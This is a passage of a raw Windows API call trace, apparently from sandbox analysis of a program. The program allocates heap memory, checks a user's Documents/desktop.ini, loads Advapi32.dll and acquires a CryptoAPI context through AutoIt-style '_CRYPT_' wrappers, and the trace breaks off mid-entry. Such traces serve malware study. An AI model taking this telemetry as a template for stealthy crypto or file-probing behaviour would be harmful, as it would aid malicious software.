HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.695] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0262.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0262.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.703] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0262.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0262.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0262.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.704] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87690 [0262.705] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0262.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.706] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0262.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0262.706] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.707] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0262.707] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0262.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.708] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0262.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0262.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.711] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0262.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0262.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.731] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0262.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0262.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.731] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0262.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.779] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0262.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0262.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0262.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0262.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.780] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0262.781] RtlAllocateHeap 